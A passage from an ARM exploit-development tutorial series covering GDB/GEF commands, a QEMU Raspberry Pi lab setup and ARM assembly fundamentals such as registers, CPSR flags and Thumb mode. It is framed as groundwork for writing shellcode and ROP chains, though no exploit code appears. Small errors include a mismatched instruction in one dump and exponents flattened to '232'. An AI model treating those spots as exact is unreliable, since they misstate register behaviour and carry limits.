  • (gdb) h
  • (gdb) apropos <search-term>
gef> apropos registers
collect -- Specify one or more data items to be collected at a tracepoint
core-file -- Use FILE as core dump for examining memory and registers
info all-registers -- List of all registers and their contents
info r -- List of integer registers and their contents
info registers -- List of integer registers and their contents
maintenance print cooked-registers -- Print the internal register configuration including cooked values
maintenance print raw-registers -- Print the internal register configuration including raw values
maintenance print registers -- Print the internal register configuration
maintenance print remote-registers -- Print the internal register configuration including each register's
p -- Print value of expression EXP
print -- Print value of expression EXP
registers -- Display full details on one
set may-write-registers -- Set permission to write into registers
set observer -- Set whether gdb controls the inferior in observer mode
show may-write-registers -- Show permission to write into registers
show observer -- Show whether gdb controls the inferior in observer mode
tui reg float -- Display only floating point registers
tui reg general -- Display only general registers
tui reg system -- Display only system registers

Breakpoint commands:

  • break (or just b) <function-name>
  • break <line-number>
  • break filename:function
  • break filename:line-number
  • break *<address>
  • break  +<offset>  
  • break  –<offset>
  • tbreak (set a temporary breakpoint)
  • del <number>  (delete breakpoint number x)
  • delete (delete all breakpoints)
  • delete <range> (delete breakpoint ranges)
  • disable/enable <breakpoint-number-or-range> (does not delete breakpoints, just enables/disables them)
  • continue (or just c) – (continue executing until next breakpoint)
  • continue <number> (continue but ignore current breakpoint number times. Useful for breakpoints within a loop.)
  • finish (continue to end of function)
gef> break _start
gef> info break
Num Type Disp Enb Address What
1 breakpoint keep y 0x00008054 <_start>
 breakpoint already hit 1 time
gef> del 1
gef> break *0x0000805c
Breakpoint 2 at 0x805c
gef> break _start

This deletes the first breakpoint and sets a breakpoint at the specified memory address. When you run the program, it will break at this exact location. If you would not delete the first breakpoint and just set a new one and run, it would break at the first breakpoint.

Start and Stop:

  • Start program execution from beginning of the program
    • run
    • r
    • run <command-line-argument>
  • Stop program execution
    • kill
  • Exit GDB debugger
    • quit
    • q
gef> run

Now that our program broke exactly where we wanted, it’s time to examine the memory. The command “x” displays memory contents in various formats.

Syntax: x/<count><format><unit>
FORMAT UNIT
x – Hexadecimal b – bytes
d – decimal h – half words (2 bytes)
i – instructions w – words (4 bytes)
t – binary (two) g – giant words (8 bytes)
o – octal
u – unsigned
s – string
c – character
gef> x/10i $pc
=> 0x8054 <_start>: push {r11, lr}
 0x8058 <_start+4>: add r11, sp, #0
 0x805c <_start+8>: sub sp, sp, #16
 0x8060 <_start+12>: mov r0, #1
 0x8064 <_start+16>: mov r1, #2
 0x8068 <_start+20>: bl 0x8074 <max>
 0x806c <_start+24>: sub sp, r11, #0
 0x8070 <_start+28>: pop {r11, pc}
 0x8074 <max>: push {r11}
 0x8078 <max+4>: add r11, sp, #0
gef> x/16xw $pc
0x8068 <_start+20>: 0xeb000001  0xe24bd000  0xe8bd8800  0xe92d0800
0x8078 <max+4>:     0xe28db000  0xe24dd00c  0xe1500001  0xb1a00001
0x8088 <max+20>:    0xe28bd000  0xe8bd0800  0xe12fff1e  0x00001741
0x8098:             0x61656100  0x01006962  0x0000000d  0x01080206

Commands for stepping through the code:

  • Step to next line of code. Will step into a function
    • stepi
    • s
    • step <number-of-steps-to-perform>
  • Execute next line of code. Will not enter functions
    • nexti
    • n
    • next <number>
  • Continue processing until you reach a specified line number, function name, address, filename:function, or filename:line-number
    • until
    • until <line-number>
  • Show current line number and which function you are in
    • where
gef> nexti 5
...
0x8068 <_start+20> bl 0x8074 <max> <- $pc
0x806c <_start+24> sub sp, r11, #0
0x8070 <_start+28> pop {r11, pc}
0x8074 <max> push {r11}
0x8078 <max+4> add r11, sp, #0
0x807c <max+8> sub sp, sp, #12
0x8080 <max+12> cmp r0, r1
0x8084 <max+16> movlt r0, r1
0x8088 <max+20> add sp, r11, #0

Examine the registers with info registers or i r

gef> info registers
r0     0x1     1
r1     0x2     2
r2     0x0     0
r3     0x0     0
r4     0x0     0
r5     0x0     0
r6     0x0     0
r7     0x0     0
r8     0x0     0
r9     0x0     0
r10    0x0     0
r11    0xbefff7e8 3204446184
r12    0x0     0
sp     0xbefff7d8 0xbefff7d8
lr     0x0     0
pc     0x8068  0x8068 <_start+20>
cpsr   0x10    16

The command “info registers” gives you the current register state. We can see the general purpose registers r0-r12, and the special purpose registers SP, LR, and PC, including the status register CPSR. The first four arguments to a function are generally stored in r0-r3. In this case, we manually moved values to r0 and r1.

Show process memory map:

gef> info proc map
process 10225
Mapped address spaces:

 Start Addr   End Addr    Size     Offset objfile
     0x8000     0x9000  0x1000          0   /home/pi/lab/max
 0xb6fff000 0xb7000000  0x1000          0          [sigpage]
 0xbefdf000 0xbf000000 0x21000          0            [stack]
 0xffff0000 0xffff1000  0x1000          0          [vectors]

With the command “disassemble” we look through the disassembly output of the function max.

gef> disassemble max
 Dump of assembler code for function max:
 0x00008074 <+0>: push {r11}
 0x00008078 <+4>: add r11, sp, #0
 0x0000807c <+8>: sub sp, sp, #12
 0x00008080 <+12>: cmp r0, r1
 0x00008084 <+16>: movlt r0, r1
 0x00008088 <+20>: add sp, r11, #0
 0x0000808c <+24>: pop {r11}
 0x00008090 <+28>: bx lr
 End of assembler dump.

GEF specific commands (more commands can be viewed using the command “gef”):

  • Dump all sections of all loaded ELF images in process memory
    • xfiles
  • Enhanced version of proc map, includes RWX attributes in mapped pages
    • vmmap
  • Memory attributes at a given address
    • xinfo
  • Inspect compiler level protection built into the running binary
    • checksec
gef> xfiles
     Start        End  Name File
0x00008054 0x00008094 .text /home/pi/lab/max
0x00008054 0x00008094 .text /home/pi/lab/max
0x00008054 0x00008094 .text /home/pi/lab/max
0x00008054 0x00008094 .text /home/pi/lab/max
0x00008054 0x00008094 .text /home/pi/lab/max
0x00008054 0x00008094 .text /home/pi/lab/max
0x00008054 0x00008094 .text /home/pi/lab/max
0x00008054 0x00008094 .text /home/pi/lab/max
0x00008054 0x00008094 .text /home/pi/lab/max
0x00008054 0x00008094 .text /home/pi/lab/max
gef> vmmap
     Start        End     Offset Perm Path
0x00008000 0x00009000 0x00000000 r-x /home/pi/lab/max
0xb6fff000 0xb7000000 0x00000000 r-x [sigpage]
0xbefdf000 0xbf000000 0x00000000 rwx [stack]
0xffff0000 0xffff1000 0x00000000 r-x [vectors]
gef> xinfo 0xbefff7e8
----------------------------------------[ xinfo: 0xbefff7e8 ]----------------------------------------
Found 0xbefff7e8
Page: 0xbefdf000 -> 0xbf000000 (size=0x21000)
Permissions: rwx
Pathname: [stack]
Offset (from page): +0x207e8
Inode: 0
gef> checksec
[+] checksec for '/home/pi/lab/max'
Canary:                  No
NX Support:              Yes
PIE Support:             No
RPATH:                   No
RUNPATH:                 No
Partial RelRO:           No
Full RelRO:              No
TROUBLESHOOTING

To make debugging with GDB more efficient it is useful to know where certain branches/jumps will take us. Certain (newer) versions of GDB resolve the addresses of a branch instruction and show us the name of the target function. For example, the following output of GDB lacks this feature:

...
0x000104f8 <+72>: bl 0x10334
0x000104fc <+76>: mov r0, #8
0x00010500 <+80>: bl 0x1034c
0x00010504 <+84>: mov r3, r0
...

And this is the output of GDB (native, without gef) which has the feature I’m talking about:

0x000104f8 <+72>:    bl      0x10334 <free@plt>
0x000104fc <+76>:    mov     r0, #8
0x00010500 <+80>:    bl      0x1034c <malloc@plt>
0x00010504 <+84>:    mov     r3, r0

If you don’t have this feature in your GDB, you can either update the Linux sources (and hope that they already have a newer GDB in their repositories) or compile a newer GDB by yourself. If you choose to compile the GDB by yourself, you can use the following commands:

cd /tmp
wget https://ftp.gnu.org/gnu/gdb/gdb-7.12.tar.gz
tar vxzf gdb-7.12.tar.gz
sudo apt-get update
sudo apt-get install libreadline-dev python-dev texinfo -y
cd gdb-7.12
./configure --prefix=/usr --with-system-readline --with-python && make -j4
sudo make -j4 -C gdb/ install
gdb --version

I used the commands provided above to download, compile and run GDB on Raspbian (jessie) without problems. these commands will also replace the previous version of your GDB. If you don’t want that, then skip the command which ends with the word install. Moreover, I did this while emulating Raspbian in QEMU, so it took me a long time (hours), because of the limited resources (CPU) on the emulated environment. I used GDB version 7.12, but you would most likely succeed even with a newer version (click HERE for other versions).

RASPBERRY PI ON QEMU

RASPBERRY PI ON QEMU

Let’s start setting up a Lab VM. We will use Ubuntu and emulate our desired ARM versions inside of it.

First, get the latest Ubuntu version and run it in a VM:

For the QEMU emulation you will need the following:

  1. A Raspbian Image: http://downloads.raspberrypi.org/raspbian/images/raspbian-2017-04-10/ (other versions might work, but Jessie is recommended)
  2. Latest qemu kernel: https://github.com/dhruvvyas90/qemu-rpi-kernel

Inside your Ubuntu VM, create a new folder:

$ mkdir ~/qemu_vms/

Download and place the Raspbian Jessie image to ~/qemu_vms/.

Download and place the qemu-kernel to ~/qemu_vms/.

$ sudo apt-get install qemu-system
$ unzip <image-file>.zip
$ fdisk -l <image-file>

You should see something like this:

Disk 2017-03-02-raspbian-jessie.img: 4.1 GiB, 4393533440 bytes, 8581120 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x432b3940

Device                          Boot  Start     End Sectors Size Id Type
2017-03-02-raspbian-jessie.img1        8192  137215  129024  63M  c W95 FAT32 (LBA)
2017-03-02-raspbian-jessie.img2      137216 8581119 8443904   4G 83 Linux

You see that the filesystem (.img2) starts at sector 137216. Now take that value and multiply it by 512, in this case it’s 512 * 137216 = 70254592 bytes. Use this value as an offset in the following command:

$ sudo mkdir /mnt/raspbian
$ sudo mount -v -o offset=70254592 -t ext4 ~/qemu_vms/<your-img-file.img> /mnt/raspbian
$ sudo nano /mnt/raspbian/etc/ld.so.preload

Comment out every entry in that file with ‘#’, save and exit with Ctrl-x » Y.

$ sudo nano /mnt/raspbian/etc/fstab

IF you see anything with mmcblk0 in fstab, then:

  1. Replace the first entry containing /dev/mmcblk0p1 with /dev/sda1
  2. Replace the second entry containing /dev/mmcblk0p2 with /dev/sda2, save and exit.
$ cd ~
$ sudo umount /mnt/raspbian

Now you can emulate it on Qemu by using the following command:

$ qemu-system-arm -kernel ~/qemu_vms/<your-kernel-qemu> -cpu arm1176 -m 256 -M versatilepb -serial stdio -append "root=/dev/sda2 rootfstype=ext4 rw" -hda ~/qemu_vms/<your-jessie-image.img> -redir tcp:5022::22 -no-reboot

If you see GUI of the Raspbian OS, you need to get into the terminal. Use Win key to get the menu, then navigate with arrow keys until you find Terminal application as shown below.

From the terminal, you need to start the SSH service so that you can access it from your host system (the one from which you launched the qemu).

Now you can SSH into it from your host system with (default password – raspberry):

$ ssh pi@127.0.0.1 -p 5022

For a more advanced network setup see the “Advanced Networking” paragraph below.

Troubleshooting

If SSH doesn’t start in your emulator at startup by default, you can change that inside your Pi terminal with:

$ sudo update-rc.d ssh enable

If your emulated Pi starts the GUI and you want to make it start in console mode at startup, use the following command inside your Pi terminal:

$ sudo raspi-config
>Select 3 – Boot Options
>Select B1 – Desktop / CLI
>Select B2 – Console Autologin

If your mouse doesn’t move in the emulated Pi, click <Windows>, arrow down to Accessories, arrow right, arrow down to Terminal, enter.

Resizing the Raspbian image

Once you are done with the setup, you are left with a total of 3,9GB on your image, which is full. To enlarge your Raspbian image, follow these steps on your Ubuntu machine:

Create a copy of your existing image:

$ cp <your-raspbian-jessie>.img rasbian.img

Run this command to resize your copy:

$ qemu-img resize raspbian.img +6G

Now start the original raspbian with enlarged image as second hard drive:

$ sudo qemu-system-arm -kernel ~/qemu_vms/<kernel-qemu> -cpu arm1176 -m 256 -M versatilepb -serial stdio -append "root=/dev/sda2 rootfstype=ext4 rw" -hda ~/qemu_vms/<your-original-raspbian-jessie>.img -redir tcp:5022::22 -no-reboot -hdb raspbian.img

Login and run:

$ sudo cfdisk /dev/sdb

Delete the second partition (sdb2) and create a New partition with all available space. Once new partition is creates, use Write to commit the changes. Then Quit the cfdisk.

Resize and check the old partition and shutdown.

$ sudo resize2fs /dev/sdb2
$ sudo fsck -f /dev/sdb2
$ sudo halt

Now you can start QEMU with your enlarged image:

$ sudo qemu-system-arm -kernel ~/qemu_vms/<kernel-qemu> -cpu arm1176 -m 256 -M versatilepb -serial stdio -append "root=/dev/sda2 rootfstype=ext4 rw" -hda ~/qemu_vms/raspbian.img -redir tcp:5022::22

Advanced Networking

In some cases you might want to access all the ports of the VM you are running in QEMU. For example, you run some binary which opens some network port(s) that you want to access/fuzz from your host (Ubuntu) system. For this purpose, we can create a shared network interface (tap0) which allows us to access all open ports (if those ports are not bound to 127.0.0.1). Thanks to @0xMitsurugi for suggesting this to include in this tutorial.

This can be done with the following commands on your HOST (Ubuntu) system:

azeria@labs:~ $ sudo apt-get install uml-utilities
azeria@labs:~ $ sudo tunctl -t tap0 -u azeria
azeria@labs:~ $ sudo ifconfig tap0 172.16.0.1/24

After these commands you should see the tap0 interface in the ifconfig output.

azeria@labs:~ $ ifconfig tap0
tap0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
inet 172.16.0.1 netmask 255.255.255.0 broadcast 172.16.0.255
ether 22:a8:a9:d3:95:f1 txqueuelen 1000 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

You can now start your QEMU VM with this command:

azeria@labs:~ $ sudo qemu-system-arm -kernel ~/qemu_vms/<kernel-qemu> -cpu arm1176 -m 256 -M versatilepb -serial stdio -append "root=/dev/sda2 rootfstype=ext4 rw" -hda ~/qemu_vms/rasbian.img -net nic -net tap,ifname=tap0,script=no,downscript=no -no-reboot

When the QEMU VM starts, you need to assign an IP to it’s eth0 interface with the following command:

pi@labs:~ $ sudo ifconfig eth0 172.16.0.2/24

If everything went well, you should be able to reach open ports on the GUEST (Raspbian) from your HOST (Ubuntu) system. You can test this with a netcat (nc) tool (see an example below).

ARM ASSEMBLY BASICS

Why ARM?

This tutorial is generally for people who want to learn the basics of ARM assembly. Especially for those of you who are interested in exploit writing on the ARM platform. You might have already noticed that ARM processors are everywhere around you. When I look around me, I can count far more devices that feature an ARM processor in my house than Intel processors. This includes phones, routers, and not to forget the IoT devices that seem to explode in sales these days. That said, the ARM processor has become one of the most widespread CPU cores in the world. Which brings us to the fact that like PCs, IoT devices are susceptible to improper input validation abuse such as buffer overflows. Given the widespread usage of ARM based devices and the potential for misuse, attacks on these devices have become much more common.

Yet, we have more experts specialized in x86 security research than we have for ARM, although ARM assembly language is perhaps the easiest assembly language in widespread use. So, why aren’t more people focusing on ARM? Perhaps because there are more learning resources out there covering exploitation on Intel than there are for ARM. Just think about the great tutorials on Intel x86 Exploit writing by Fuzzy Security or the Corelan Team – Guidelines like these help people interested in this specific area to get practical knowledge and the inspiration to learn beyond what is covered in those tutorials. If you are interested in x86 exploit writing, the Corelan and Fuzzysec tutorials are your perfect starting point. In this tutorial series here, we will focus on assembly basics and exploit writing on ARM.

ARM PROCESSOR VS. INTEL PROCESSOR

There are many differences between Intel and ARM, but the main difference is the instruction set. Intel is a CISC (Complex Instruction Set Computing) processor that has a larger and more feature-rich instruction set and allows many complex instructions to access memory. It therefore has more operations, addressing modes, but less registers than ARM. CISC processors are mainly used in normal PC’s, Workstations, and servers.

ARM is a RISC (Reduced instruction set Computing) processor and therefore has a simplified instruction set (100 instructions or less) and more general purpose registers than CISC. Unlike Intel, ARM uses instructions that operate only on registers and uses a Load/Store memory model for memory access, which means that only Load/Store instructions can access memory. This means that incrementing a 32-bit value at a particular memory address on ARM would require three types of instructions (load, increment and store) to first load the value at a particular address into a register, increment it within the register, and store it back to the memory from the register.

The reduced instruction set has its advantages and disadvantages. One of the advantages is that instructions can be executed more quickly, potentially allowing for greater speed (RISC systems shorten execution time by reducing the clock cycles per instruction). The downside is that less instructions means a greater emphasis on the efficient writing of software with the limited instructions that are available. Also important to note is that ARM has two modes, ARM mode and Thumb mode.

More differences between ARM and x86 are:

  • In ARM, most instructions can be used for conditional execution.
  • The Intel x86 and x86-64 series of processors use the little-endian format
  • The ARM architecture was little-endian before version 3. Since then ARM processors became BI-endian and feature a setting which allows for switchable endianness.

There are not only differences between Intel and ARM, but also between different ARM version themselves. This tutorial series is intended to keep it as generic as possible so that you get a general understanding about how ARM works. Once you understand the fundamentals, it’s easy to learn the nuances for your chosen target ARM version. The examples in this tutorial were created on an 32-bit ARMv6 (Raspberry Pi 1), therefore the explanations are related to this exact version.

The naming of the different ARM versions might also be confusing:

ARM family ARM architecture
ARM7 ARM v4
ARM9 ARM v5
ARM11 ARM v6
Cortex-A ARM v7-A
Cortex-R ARM v7-R
Cortex-M ARM v7-M
WRITING ASSEMBLY

Before we can start diving into ARM exploit development we first need to understand the basics of Assembly language programming, which requires a little background knowledge before you can start to appreciate it. But why do we even need ARM Assembly, isn’t it enough to write our exploits in a “normal” programming / scripting language? It is not, if we want to be able to do Reverse Engineering and understand the program flow of ARM binaries, build our own ARM shellcode, craft ARM ROP chains, and debug ARM applications.

You don’t need to know every little detail of the Assembly language to be able to do Reverse Engineering and exploit development, yet some of it is required for understanding the bigger picture. The fundamentals will be covered in this tutorial series. If you want to learn more you can visit the links listed at the end of this chapter.

So what exactly is Assembly language? Assembly language is just a thin syntax layer on top of the machine code which is composed of instructions, that are encoded in binary representations (machine code), which is what our computer understands. So why don’t we just write machine code instead? Well, that would be a pain in the ass. For this reason, we will write assembly, ARM assembly, which is much easier for humans to understand. Our computer can’t run assembly code itself, because it needs machine code. The tool we will use to assemble the assembly code into machine code is a GNU Assembler from the GNU Binutils project named as which works with source files having the *.s extension.

Once you wrote your assembly file with the extension *.s, you need to assemble it with as and link it with ld:

$ as program.s -o program.o
$ ld program.o -o program

ASSEMBLY UNDER THE HOOD

Let’s start at the very bottom and work our way up to the assembly language. At the lowest level, we have our electrical signals on our circuit. Signals are formed by switching the electrical voltage to one of two levels, say 0 volts (‘off’) or 5 volts (‘on’). Because just by looking we can’t easily tell what voltage the circuit is at, we choose to write patterns of on/off voltages using visual representations, the digits 0 and 1, to not only represent the idea of an absence or presence of a signal, but also because 0 and 1 are digits of the binary system. We then group the sequence of 0 and 1 to form a machine code instruction which is the smallest working unit of a computer processor. Here is an example of a machine language instruction:

1110 0001 1010 0000 0010 0000 0000 0001

So far so good, but we can’t remember what each of these patterns (of 0 and 1) mean.  For this reason, we use so called mnemonics, abbreviations to help us remember these binary patterns, where each machine code instruction is given a name. These mnemonics often consist of three letters, but this is not obligatory. We can write a program using these mnemonics as instructions. This program is called an Assembly language program, and the set of mnemonics that is used to represent a computer’s machine code is called the Assembly language of that computer. Therefore, Assembly language is the lowest level used by humans to program a computer. The operands of an instruction come after the mnemonic(s). Here is an example:

MOV R2, R1

Now that we know that an assembly program is made up of textual information called mnemonics, we need to get it converted into machine code. As mentioned above, in the case of ARM assembly, the GNU Binutils project supplies us with a tool called as. The process of using an assembler like as to convert from (ARM) assembly language to (ARM) machine code is called assembling.

In summary, we learned that computers understand (respond to) the presence or absence of voltages (signals) and that we can represent multiple signals in a sequence of 0s and 1s (bits). We can use machine code (sequences of signals) to cause the computer to respond in some well-defined way. Because we can’t remember what all these sequences mean, we give them abbreviations – mnemonics, and use them to represent instructions. This set of mnemonics is the Assembly language of the computer and we use a program called Assembler to convert code from mnemonic representation to the computer-readable machine code, in the same way a compiler does for high-level languages.

DATA TYPES

This is part two of the ARM Assembly Basics tutorial series, covering data types and registers.

Similar to high level languages, ARM supports operations on different datatypes.
The data types we can load (or store) can be signed and unsigned words, halfwords, or bytes. The extensions for these data types are: -h or -sh for halfwords, -b or -sb for bytes, and no extension for words. The difference between signed and unsigned data types is:

  • Signed data types can hold both positive and negative values and are therefore lower in range.
  • Unsigned data types can hold large positive values (including ‘Zero’) but cannot hold negative values and are therefore wider in range.

Here are some examples of how these data types can be used with the instructions Load and Store:

ldr = Load Word
ldrh = Load unsigned Half Word
ldrsh = Load signed Half Word
ldrb = Load unsigned Byte
ldrsb = Load signed Bytes

str = Store Word
strh = Store unsigned Half Word
strsh = Store signed Half Word
strb = Store unsigned Byte
strsb = Store signed Byte
ENDIANNESS

There are two basic ways of viewing bytes in memory: Little-Endian (LE) or Big-Endian (BE). The difference is the byte-order in which each byte of an object is stored in memory. On little-endian machines like Intel x86, the least-significant-byte is stored at the lowest address (the address closest to zero). On big-endian machines the most-significant-byte is stored at the lowest address. The ARM architecture was little-endian before version 3, since then it is bi-endian, which means that it features a setting which allows for switchable endianness. On ARMv6 for example, instructions are fixed little-endian and data accesses can be either little-endian or big-endian as controlled by bit 9, the E bit, of the Program Status Register (CPSR).

ARM REGISTERS

The amount of registers depends on the ARM version. According to the ARM Reference Manual, there are 30 general-purpose 32-bit registers, with the exception of ARMv6-M and ARMv7-M based processors. The first 16 registers are accessible in user-level mode, the additional registers are available in privileged software execution (with the exception of ARMv6-M and ARMv7-M). In this tutorial series we will work with the registers that are accessible in any privilege mode: r0-15. These 16 registers can be split into two groups: general purpose and special purpose registers.

The following table is just a quick glimpse into how the ARM registers could relate to those in Intel processors.

R0-R12: can be used during common operations to store temporary values, pointers (locations to memory), etc. R0, for example, can be referred as accumulator during the arithmetic operations or for storing the result of a previously called function. R7 becomes useful while working with syscalls as it stores the syscall number and R11 helps us to keep track of boundaries on the stack serving as the frame pointer (will be covered later). Moreover, the function calling convention on ARM specifies that the first four arguments of a function are stored in the registers r0-r3.

R13: SP (Stack Pointer). The Stack Pointer points to the top of the stack. The stack is an area of memory used for function-specific storage, which is reclaimed when the function returns. The stack pointer is therefore used for allocating space on the stack, by subtracting the value (in bytes) we want to allocate from the stack pointer. In other words, if we want to allocate a 32 bit value, we subtract 4 from the stack pointer.

R14: LR (Link Register). When a function call is made, the Link Register gets updated with a memory address referencing the next instruction where the function was initiated from. Doing this allows the program return to the “parent” function that initiated the “child” function call after the “child” function is finished.

R15: PC (Program Counter). The Program Counter is automatically incremented by the size of the instruction executed. This size is always 4 bytes in ARM state and 2 bytes in THUMB mode. When a branch instruction is being executed, the PC holds the destination address. During execution, PC stores the address of the current instruction plus 8 (two ARM instructions) in ARM state, and the current instruction plus 4 (two Thumb instructions) in Thumb(v1) state. This is different from x86 where PC always points to the next instruction to be executed.

Let’s look at how PC behaves in a debugger. We use the following program to store the address of pc into r0 and include two random instructions. Let’s see what happens.

.section .text
.global _start

_start:
 mov r0, pc
 mov r1, #2
 add r2, r1, r1
 bkpt

In GDB we set a breakpoint at _start and run it:

gef> br _start
Breakpoint 1 at 0x8054
gef> run

Here is a screenshot of the output we see first:

$r0 0x00000000   $r1 0x00000000   $r2 0x00000000   $r3 0x00000000 
$r4 0x00000000   $r5 0x00000000   $r6 0x00000000   $r7 0x00000000 
$r8 0x00000000   $r9 0x00000000   $r10 0x00000000  $r11 0x00000000 
$r12 0x00000000  $sp 0xbefff7e0   $lr 0x00000000   $pc 0x00008054 
$cpsr 0x00000010 

0x8054 <_start> mov r0, pc     <- $pc
0x8058 <_start+4> mov r0, #2
0x805c <_start+8> add r1, r0, r0
0x8060 <_start+12> bkpt 0x0000
0x8064 andeq r1, r0, r1, asr #10
0x8068 cmnvs r5, r0, lsl #2
0x806c tsteq r0, r2, ror #18
0x8070 andeq r0, r0, r11
0x8074 tsteq r8, r6, lsl #6

We can see that PC holds the address (0x8054) of the next instruction (mov r0, pc) that will be executed. Now let’s execute the next instruction after which R0 should hold the address of PC (0x8054), right?

$r0 0x0000805c   $r1 0x00000000   $r2 0x00000000   $r3 0x00000000 
$r4 0x00000000   $r5 0x00000000   $r6 0x00000000   $r7 0x00000000 
$r8 0x00000000   $r9 0x00000000   $r10 0x00000000  $r11 0x00000000 
$r12 0x00000000  $sp 0xbefff7e0   $lr 0x00000000   $pc 0x00008058 
$cpsr 0x00000010

0x8058 <_start+4> mov r0, #2       <- $pc
0x805c <_start+8> add r1, r0, r0
0x8060 <_start+12> bkpt 0x0000
0x8064 andeq r1, r0, r1, asr #10
0x8068 cmnvs r5, r0, lsl #2
0x806c tsteq r0, r2, ror #18
0x8070 andeq r0, r0, r11
0x8074 tsteq r8, r6, lsl #6
0x8078 adfcssp f0, f0, #4.0

…right? Wrong. Look at the address in R0. While we expected R0 to contain the previously read PC value (0x8054) it instead holds the value which is two instructions ahead of the PC we previously read (0x805c). From this example you can see that when we directly read PC it follows the definition that PC points to the next instruction; but when debugging, PC points two instructions ahead of the current PC value (0x8054 + 8 = 0x805C). This is because older ARM processors always fetched two instructions ahead of the currently executed instructions. The reason ARM retains this definition is to ensure compatibility with earlier processors.

CURRENT PROGRAM STATUS REGISTER

When you debug an ARM binary with gdb, you see something called Flags:

The register $cpsr shows the value of the Current Program Status Register (CPSR) and under that you can see the Flags thumb, fast, interrupt, overflow, carry, zero, and negative. These flags represent certain bits in the CPSR register and are set according to the value of the CPSR and turn bold when activated. The N, Z, C, and V bits are identical to the SF, ZF, CF, and OF bits in the EFLAG register on x86. These bits are used to support conditional execution in conditionals and loops at the assembly level. We will cover condition codes used in Conditional Execution and Branching.

The picture above shows a layout of a 32-bit register (CPSR) where the left (<-) side holds most-significant-bits and the right (->) side the least-significant-bits. Every single cell (except for the GE and M section along with the blank ones) are of a size of one bit. These one bit sections define various properties of the program’s current state.

Let’s assume we would use the CMP instruction to compare the numbers 1 and 2. The outcome would be ‘negative’ because 1 – 2 = -1. When we compare two equal numbers, like 2 against 2, the Z (zero) flag is set because 2 – 2 = 0. Keep in mind that the registers used with the CMP instruction won’t be modified, only the CPSR will be modified based on the result of comparing these registers against each other.

This is how it looks like in GDB (with GEF installed): In this example we compare the registers r1 and r0, where r1 = 4 and r0 = 2. This is how the flags look like after executing the cmp r1, r0 operation:

The Carry Flag is set because we use cmp r1, r0 to compare 4 against 2 (4 – 2). In contrast, the Negative flag (N) is set if we use cmp r0, r1 to compare a smaller number (2) against a bigger number (4).

Here’s an excerpt from the ARM infocenter:

The APSR contains the following ALU status flags:

N – Set when the result of the operation was Negative.

Z – Set when the result of the operation was Zero.

C – Set when the operation resulted in a Carry.

V – Set when the operation caused oVerflow.

A carry occurs:

  • if the result of an addition is greater than or equal to 232
  • if the result of a subtraction is positive or zero
  • as the result of an inline barrel shifter operation in a move or logical instruction.

Overflow occurs if the result of an add, subtract, or compare is greater than or equal to 231, or less than –231.

ARM & THUMB

ARM processors have two main states they can operate in (let’s not count Jazelle here), ARM and Thumb. These states have nothing to do with privilege levels. For example, code running in SVC mode can be either ARM or Thumb. The main difference between these two states is the instruction set, where instructions in ARM state are always 32-bit, and  instructions in Thumb state are 16-bit (but can be 32-bit). Knowing when and how to use Thumb is especially important for our ARM exploit development purposes. When writing ARM shellcode, we need to get rid of NULL bytes and using 16-bit Thumb instructions instead of 32-bit ARM instructions reduces the chance of having them.

The calling conventions of ARM versions is more than confusing and not all ARM versions support the same Thumb instruction sets. At some point, ARM introduced an enhanced Thumb instruction set (pseudo name: Thumbv2) which allows 32-bit Thumb instructions and even conditional execution, which was not possible in the versions prior to that. In order to use conditional execution in Thumb state, the “it” instruction was introduced. However, this instruction got then removed in a later version and exchanged with something that was supposed to make things less complicated, but achieved the opposite. I don’t know all the different variations of ARM/Thumb instruction sets across all the different ARM versions, and I honestly don’t care. Neither should you. The only thing that you need to know is the ARM version of your target device and its specific Thumb support so that you can adjust your code. The ARM Infocenter should help you figure out the specifics of your ARM version (http://infocenter.arm.com/help/index.jsp).

As mentioned before, there are different Thumb versions. The different naming is just for the sake of differentiating them from each other (the processor itself will always refer to it as Thumb).

  • Thumb-1 (16-bit instructions): was used in ARMv6 and earlier architectures.
  • Thumb-2 (16-bit and 32-bit instructions): extents Thumb-1 by adding more instructions and allowing them to be either 16-bit or 32-bit wide (ARMv6T2, ARMv7).
  • ThumbEE: includes some changes and additions aimed for dynamically generated code (code compiled on the device either shortly before or during execution).

Differences between ARM and Thumb:

  • Conditional execution: All instructions in ARM state support conditional execution. Some ARM processor versions allow conditional execution in Thumb by using the IT instruction. Conditional execution leads to higher code density because it reduces the number of instructions to be executed and reduces the number of expensive branch instructions.
  • 32-bit ARM and Thumb instructions: 32-bit Thumb instructions have a .w suffix.
  • The barrel shifter is another unique ARM mode feature. It can be used to shrink multiple instructions into one. For example, instead of using two instructions for a multiply (multiplying register by 2 and using MOV to store result into another register), you can include the multiply inside a MOV instruction by using shift left by 1 -> Mov  R1, R0, LSL #1      ; R1 = R0 * 2

To switch the state in which the processor executes in, one of two conditions have to be met:

  • We can use the branch instruction BX (branch and exchange) or BLX (branch, link, and exchange) and set the destination register’s least significant bit to 1. This can be achieved by adding 1 to an offset, like 0x5530 + 1. You might think that this would cause alignment issues, since instructions are either 2- or 4-byte aligned. This is not a problem because the processor will ignore the least significant bit.
  • We know that we are in Thumb mode if the T bit in the current program status register is set.
    • We know that we are in Thumb mode if the T bit in the current program status register is set.
    INTRODUCTION TO ARM INSTRUCTIONS

    The purpose of this part is to briefly introduce into the ARM’s instruction set and it’s general use. It is crucial for us to understand how the smallest piece of the Assembly language operates, how they connect to each other, and what can be achieved by combining them.

    As mentioned earlier, Assembly language is composed of instructions which are the main building blocks. ARM instructions are usually followed by one or two operands and generally use the following template:

    MNEMONIC{S}{condition} {Rd}, Operand1, Operand2

    Due to flexibility of the ARM instruction set, not all instructions use all of the fields provided in the template. Nevertheless, the purpose of fields in the template are described as follows:

    MNEMONIC     - Short name (mnemonic) of the instruction
    {S}          - An optional suffix. If S is specified, the condition flags are updated on the result of the operation
    {condition}  - Condition that is needed to be met in order for the instruction to be executed
    {Rd}         - Register (destination) for storing the result of the instruction
    Operand1     - First operand. Either a register or an immediate value 
    Operand2     - Second (flexible) operand. Can be an immediate value (number) or a register with an optional shift

